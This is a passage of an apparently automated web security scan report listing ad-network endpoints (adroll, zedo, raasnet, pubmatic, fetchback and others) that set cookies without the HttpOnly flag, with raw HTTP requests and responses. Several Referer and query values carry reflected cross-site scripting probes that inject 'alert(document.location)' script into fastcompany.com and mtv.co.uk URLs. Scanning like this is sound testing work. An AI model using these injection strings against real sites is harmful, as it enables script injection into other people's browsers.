The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 12 Sep 2011 12:49:02 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/i/blank.gif
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


5.26. http://d.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7?pv=31528584146.87216&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 12 Sep 2011 12:50:17 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


5.27. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2
If-None-Match: "436874d-5d7-4aa4ddaecd340"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 11 Sep 2012 12:49:18 GMT;domain=.zedo.com;path=/;
ETag: "9e27dc-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=419812
Expires: Sat, 17 Sep 2011 09:26:10 GMT
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

5.28. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x420r5075003
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2; FFgeo=5386156; FFcat=933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=1:0:0:0:0:0:0; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 11 Dec 2011 12:49:31 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=985B826,20|121_977#0;expires=Tue, 11 Sep 2012 12:49:31 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=8401
Expires: Mon, 12 Sep 2011 15:09:32 GMT
Date: Mon, 12 Sep 2011 12:49:31 GMT
Connection: close

GIF89a.............!.......,...........D..;



5.29. http://d7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669088Zc826000622%2C826000622Zs403Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=945
Date: Mon, 12 Sep 2011 12:48:46 GMT
Connection: close



5.30. http://dts1.raasnet.com/dts/bizo/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/bizo/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/bizo/in?industry=business_services&location=texas HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.31. http://dts1.raasnet.com/dts/exelate/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/exelate/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/exelate/in?segments=&t=i HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.32. http://dts1.raasnet.com/dts/targus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/targus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/targus?segment=000&zip=&fage=&fgender=&fts=&sage=&sgender=&sts= HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.33. http://f21.360tag.com/t6/1418/MTV/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f21.360tag.com
Path:   /t6/1418/MTV/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t6/1418/MTV/?rf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&l=en-US&pg=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&pl=Win32&cd=16&rs=1920x1200&tz=300&je=true&rn=1405901022&at=PageView&tv=1&t360_T=2&t360_RN2=1967621374&t360_Referrer=&txd=360tag.com HTTP/1.1
Host: f21.360tag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: t1=N1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private,no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1066373836/?label=hLH-CJz7gQIQzKW-_AM&guid=ON&script=0
Set-Cookie: tguid=d37d83f3-b7f3-4436-ae61-5a4ec6697d9e; domain=.360tag.com; expires=Sun, 12-Sep-2021 13:05:06 GMT; path=/
Set-Cookie: tid=0; domain=.360tag.com; expires=Sun, 11-Sep-2011 13:05:06 GMT; path=/
Set-Cookie: sguid=466d899d-3f45-470d-9e6b-6f8d7ed32ebd; domain=.360tag.com; path=/
X-Powered-By: PHP/5.2.11
Server: Apache/2.2.14
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC", policyref="http://www.360tag.com/w3c/p3p.xml"
Date: Mon, 12 Sep 2011 13:05:05 GMT
Content-Length: 0


5.34. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

5.35. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...

5.36. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



5.37. http://load.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=250&j=0 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
